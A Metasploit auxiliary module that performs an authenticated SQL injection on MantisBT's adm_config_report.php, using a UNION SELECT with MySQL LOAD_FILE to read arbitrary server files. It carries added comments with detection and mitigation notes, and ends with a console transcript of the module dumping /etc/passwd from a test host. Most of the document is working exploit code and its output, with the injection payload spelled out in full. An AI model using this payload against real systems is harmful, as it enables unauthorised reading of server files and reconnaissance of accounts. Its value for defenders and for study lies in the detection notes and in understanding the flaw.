##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

# Auxiliary module: MantisBT admin-side SQL injection used for arbitrary file read.
#
# What the module does, as visible below:
#   1. Authenticates against login.php with the USERNAME/PASSWORD options and
#      keeps the session cookies returned by the server.
#   2. Sends a POST to adm_config_report.php in which the `filter_config_id`
#      parameter carries a UNION SELECT that wraps MySQL LOAD_FILE() of the
#      hex-encoded FILE path between two marker strings.
#   3. Extracts the hex blob between the markers from the response body,
#      decodes it and prints it.
#
# Detection / mitigation notes (for defenders reading this as a reference):
#   - The request is high-signal in web-server or WAF logs: a POST to
#     adm_config_report.php whose `filter_config_id` value contains
#     `UNION ALL SELECT`, `LOAD_FILE(` and hex literals.
#   - The read happens with the database account's privileges; MySQL's
#     FILE privilege and `secure_file_priv` bound what LOAD_FILE() can
#     return, so a least-privilege DB account limits impact.
#   - The module requires valid credentials for the admin config report
#     page; it is an authenticated, post-login injection.
#   - The transcript after __END__ shows it run against a
#     "mantisbt-1.2.16" install path; affected versions beyond that are
#     not stated here.
class Metasploit3 < Msf::Auxiliary
  Rank = GoodRanking

  include Msf::Exploit::Remote::HttpClient

  # Registers module metadata and the user-settable options.
  #
  # NOTE(review): 'Description', 'Author' and 'References' are empty; the
  # module should at least name the vulnerable component and link the
  # public advisory so operators can triage findings.
  def initialize(info={})
    super(update_info(info,
      'Name' => "MantisBT Admin SQL Injection Arbitrary File Read",
      'Description' => %q{ },
      'License' => MSF_LICENSE,
      'Author' => [ ],
      'References' => [ ],
      'Platform' => ['win', 'linux'],
      'Privileged' => false,
      'DisclosureDate' => "Feb 28 2014"))

    register_options(
      [
        # Path of the file to read on the database host (passed to LOAD_FILE).
        OptString.new('FILE', [ true, 'Path to remote file', '/etc/passwd']),
        # Credentials for the MantisBT account used to reach adm_config_report.php.
        OptString.new('USERNAME', [ true, 'Single username', 'administrator']),
        OptString.new('PASSWORD', [ true, 'Single password', 'password']),
        OptString.new('TARGETURI', [ true, 'Relative URI of MantisBT installation', '/'])
      ], self.class)
  end

  # Logs in, issues the injected report request and prints the decoded file.
  #
  # NOTE(review): neither send_request_cgi result is checked. When the host
  # does not answer, `resp` is nil and `resp.get_cookies` / `resp.body`
  # raise NoMethodError instead of a clear failure message.
  def run
    # Form fields mirror MantisBT's login form; 'return' is the post-login redirect target.
    post = {
      'return' => 'index.php',
      'username' => datastore['USERNAME'],
      'password' => datastore['PASSWORD'],
      'secure_session' => 'on'
    }

    resp = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, '/login.php'),
      'method' => 'POST',
      'vars_post' => post
    })

    # Session cookies from the login response are replayed on the next request.
    cookie = resp.get_cookies

    # FILE is hex-encoded so it can be passed to LOAD_FILE() as a 0x... literal
    # without quotes (avoids breaking the injected string context).
    filepath = datastore['FILE'].unpack("H*")[0]

    # The injected value is URL-encoded; 0x71676a7571 / 0x7169727071 are the
    # ASCII markers "qgjuq" / "qirpq" used to locate the result in the HTML,
    # IFNULL(...) keeps the row present when the file cannot be read, and the
    # trailing %23 ("#") comments out the remainder of the original query.
    resp = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, '/adm_config_report.php'),
      'method' => 'POST',
      'data' => "save=1&filter_user_id=0&filter_project_id=0&filter_config_id=-7856%27+UNION+ALL+SELECT+11%2C11%2C11%2C11%2CCONCAT%280x71676a7571%2CIFNULL%28CAST%28HEX%28LOAD_FILE%280x#{filepath}%29%29+AS+CHAR%29%2C0x20%29%2C0x7169727071%29%2C11%23&apply_filter_button=Apply+Filter",
      'cookie' => cookie,
    })

    # Pull the hex payload from between the markers and decode it.
    # NOTE(review): if the markers are absent (login failed, page not
    # vulnerable, file unreadable) `$1` is nil and `[nil].pack("H*")` raises
    # TypeError; a guard with print_error would make failure explicit.
    resp.body =~ /qgjuq(.*)qirpq/
    file = [$1].pack("H*")
    print_good(file)
  end
end

__END__
bperry@ubuntu:~/tools/metasploit-framework$ ./msfconsole Call trans opt: received. 2-19-98 13:24:18 REC:Loc Trace program: running wake up, Neo... 
the matrix has you follow the white rabbit. knock, knock, Neo. (`. ,-, ` `. ,;' / `. ,'/ .' `. X /.' .-;--''--.._` ` ( .' / ` , ` ' Q ' , , `._ \ ,.| ' `-.;_' : . ` ; ` ` --,.._; ' ` , ) .' `._ , ' /_ ; ,''-,;' ``- ``-..__``--` http://metasploit.pro =[ metasploit v4.8.0-dev [core:4.8 api:1.0] + -- --=[ 1178 exploits - 649 auxiliary - 186 post + -- --=[ 312 payloads - 30 encoders - 8 nops msf > use auxiliary/gather/mantisbt_admin_sqli msf auxiliary(mantisbt_admin_sqli) > set RHOST 172.31.16.109 RHOST => 172.31.16.109 msf auxiliary(mantisbt_admin_sqli) > set TARGETURI /mantisbt-1.2.16/ TARGETURI => /mantisbt-1.2.16/ msf auxiliary(mantisbt_admin_sqli) > set PASSWORD password PASSWORD => password msf auxiliary(mantisbt_admin_sqli) > show options Module options (auxiliary/gather/mantisbt_admin_sqli): Name Current Setting Required Description ---- --------------- -------- ----------- FILE /etc/passwd yes Path to remote file PASSWORD password yes Single password Proxies no Use a proxy chain RHOST 172.31.16.109 yes The target address RPORT 80 yes The target port TARGETURI /mantisbt-1.2.16/ yes Relative URI of MantisBT installation USERNAME administrator yes Single username VHOST no HTTP server virtual host msf auxiliary(mantisbt_admin_sqli) > run [+] root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh 
libuuid:x:100:101::/var/lib/libuuid:/bin/sh syslog:x:101:103::/home/syslog:/bin/false messagebus:x:102:104::/var/run/dbus:/bin/false bperry:x:1000:1000:Brandon Perry,,,:/home/bperry:/bin/bash avahi-autoipd:x:103:110:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false usbmux:x:104:46:usbmux daemon,,,:/home/usbmux:/bin/false dnsmasq:x:105:65534:dnsmasq,,,:/var/lib/misc:/bin/false whoopsie:x:106:114::/nonexistent:/bin/false avahi:x:107:116:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false colord:x:108:118:colord colour management daemon,,,:/var/lib/colord:/bin/false kernoops:x:109:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false pulse:x:110:119:PulseAudio daemon,,,:/var/run/pulse:/bin/false rtkit:x:111:121:RealtimeKit,,,:/proc:/bin/false saned:x:112:122::/home/saned:/bin/false speech-dispatcher:x:113:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/sh lightdm:x:114:123:Light Display Manager:/var/lib/lightdm:/bin/false hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false mysql:x:116:125:MySQL Server,,,:/nonexistent:/bin/false [*] Auxiliary module execution completed msf auxiliary(mantisbt_admin_sqli) >